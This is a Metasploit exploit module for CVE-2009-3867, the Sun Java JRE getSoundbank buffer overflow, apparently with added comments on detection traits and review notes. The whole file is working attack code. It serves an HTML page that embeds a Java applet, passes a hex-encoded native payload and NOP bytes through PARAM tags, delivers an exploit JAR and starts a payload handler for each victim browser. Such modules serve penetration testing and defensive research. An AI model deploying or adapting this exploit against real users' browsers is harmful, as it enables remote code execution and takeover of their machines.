GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_getsoundbank_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
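# Browser-delivered module for CVE-2009-3867 (Sun Java JRE getSoundbank
# file:// URI buffer overflow).
#
# What the code in this file does:
# * runs an HTTP server (HttpServer::HTML mixin),
# * answers page requests with HTML that embeds a Java applet, and
# * answers requests whose URI ends in ".jar" with a static JAR read from the
#   framework data directory.
# No getSoundbank call appears in this file; the trigger is presumably inside
# that JAR (applet class 'AppletX') -- confirm against the JAR source.
#
# Response characteristics visible in this file, useful when writing
# detections or reviewing proxy logs:
# * an <applet> tag with code='AppletX' and an archive name made of 32 random
#   alphanumeric characters followed by ".jar",
# * two <param> tags named 'sc' and 'np' whose values are hex strings
#   ('np' is the hex encoding of four 0x90 bytes),
# * the JAR is sent as application/octet-stream, and both the HTML and the JAR
#   responses carry "Pragma: no-cache".
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata: name, description, references, payload
  # constraints, supported targets and disclosure date.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',
      'Description' => %q{
        This module exploits a flaw in the getSoundbank function in the Sun JVM.

        The payload is serialized and passed to the applet via PARAM tags. It must be
        a native payload.

        The effected Java versions are JDK and JRE 6 Update 16 and earlier,
        JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
        earlier, and SDK and JRE 1.3.1_26 and earlier.

        NOTE: Although all of the above versions are reportedly vulnerable, only
        1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'kf',    # Original PoC/exploit
          'jduck'  # metasploit version
        ],
      'References' =>
        [
          [ 'CVE', '2009-3867' ],
          [ 'OSVDB', '59711' ],
          [ 'BID', '36881' ],
          [ 'ZDI', '09-076' ]
        ],
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true,
        },
      'Platform' => %w{ win osx },
      'Targets' =>
        [
=begin

No automatic targeting for now ...

          [ 'J2SE 1.6_16 Automatic',
            {
              'Platform' => %w{ linux osx win },
              'Arch' => [ARCH_X86, ARCH_PPC]
            }
          ],
=end
          [ 'J2SE 1.6_16 on Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [ 'J2SE 1.6_16 on Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
          [ 'J2SE 1.6_16 on Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2009-11-04'
    ))
  end

  # Reads the static JAR into @jar_data, then hands control to the parent
  # class's exploit method.
  def exploit
    # load the static jar
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3867.jar")

    # Block form closes the file handle even when the read raises.
    @jar_data = File.open(path, "rb") { |fd| fd.read }

    super
  end

  # Handles one HTTP request from a client.
  #
  # Requests whose URI ends in ".jar" receive the JAR and then the payload
  # handler is invoked; every other request receives either a redirect to the
  # trailing-slash form of the resource or the applet-loading HTML.
  #
  # @param cli the client connection (only #peerhost is read here)
  # @param req the HTTP request (#uri and the User-Agent header are read)
  def on_request_uri(cli, req)
    now = Time.now.to_i

    # Create a cached mapping between IP and detected target
    @targetcache ||= {}
    @targetcache[cli.peerhost] ||= {}
    @targetcache[cli.peerhost][:update] = now

    # NOTE(review): no target defined in initialize has "Automatic" in its
    # name (that entry is commented out), so this branch is not reached with
    # the current target list. The indices 1..3 below assume the Automatic
    # entry sits at index 0 and would be off by one without it.
    if (target.name =~ /Automatic/)
      case req.headers['User-Agent']
      when /Windows/i
        print_status("Choosing a Windows target")
        @targetcache[cli.peerhost][:target] = self.targets[1]
      when /PPC Mac OS X/i
        print_status("Choosing a Mac OS X PPC target")
        @targetcache[cli.peerhost][:target] = self.targets[2]
      when /Intel Mac OS X/i
        print_status("Choosing a Mac OS X x86 target")
        @targetcache[cli.peerhost][:target] = self.targets[3]
      else
        print_status("Unknown target for: #{req.headers['User-Agent']}")
      end
    end

    # Clean the cache: drop entries that were not refreshed in the last 60 seconds
    @targetcache.delete_if { |_addr, entry| now > entry[:update] + 60 }

    # Request processing
    unless req.uri.match(/\.jar$/i)

      # Redirect to the base directory so the applet code loads...
      unless req.uri.match(/\/$/)
        print_status("Sending redirect so path ends with / ...")
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      # Display the applet loading HTML
      print_status("Sending HTML")
      send_response_html(cli, generate_html(payload.encoded),
        {
          'Content-Type' => 'text/html',
          'Pragma' => 'no-cache'
        })
      return
    end

    # Send the actual applet over
    print_status("Sending applet")
    send_response(cli, generate_applet(cli, req),
      {
        'Content-Type' => 'application/octet-stream',
        'Pragma' => 'no-cache'
      })

    # Handle the payload
    handler(cli)
  end

  # Builds the HTML page that embeds the applet.
  #
  # The template placeholders JARNAME, SCODE and NOPS are replaced with a
  # random 32-character ".jar" name, the hex-encoded payload and the
  # hex-encoded value of +nops+ respectively.
  #
  # @param pl [String] the encoded payload bytes
  # @return [String] the finished HTML document
  def generate_html(pl)
    html = <<-EOF
<html>
<head>
<!-- <meta http-equiv=refresh content=10 /> -->
</head>
<body>
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
<param name='sc' value='SCODE' />
<param name='np' value='NOPS' />
</applet>
</body>
</html>
EOF

    # finalize the html
    jar_name = rand_text_alphanumeric(32) + '.jar'
    html.gsub!(/JARNAME/, jar_name)

    # add payload
    debug_payload = false # hard-coded off; when on, a 0xCC byte is prepended and the buffer is dumped
    pload = ""
    pload << "\xcc" if debug_payload
    pload << pl

    # Pad with random bytes up to the next multiple of four.
    remainder = pload.length % 4
    pload << rand_text(4 - remainder) if remainder > 0

    if debug_payload
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
    end
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

    # add nops
    nops = "\x90\x90\x90\x90"
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
    #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

    html
  end

  # Returns the bytes sent in response to a ".jar" request.
  #
  # When the selected target's name contains "Automatic" and no target has
  # been cached for the requesting host, an empty string is returned;
  # otherwise the JAR loaded by #exploit is returned unchanged.
  #
  # @param cli the client connection (only #peerhost is read)
  # @param req the HTTP request (unused; kept for the existing call signature)
  # @return [String] the JAR contents or an empty string
  def generate_applet(cli, req)
    if (target.name =~ /Automatic/)
      # Guard against a missing cache or cache entry instead of raising.
      entry = @targetcache && @targetcache[cli.peerhost]
      return '' unless entry && entry[:target]
    end

    @jar_data
  end
end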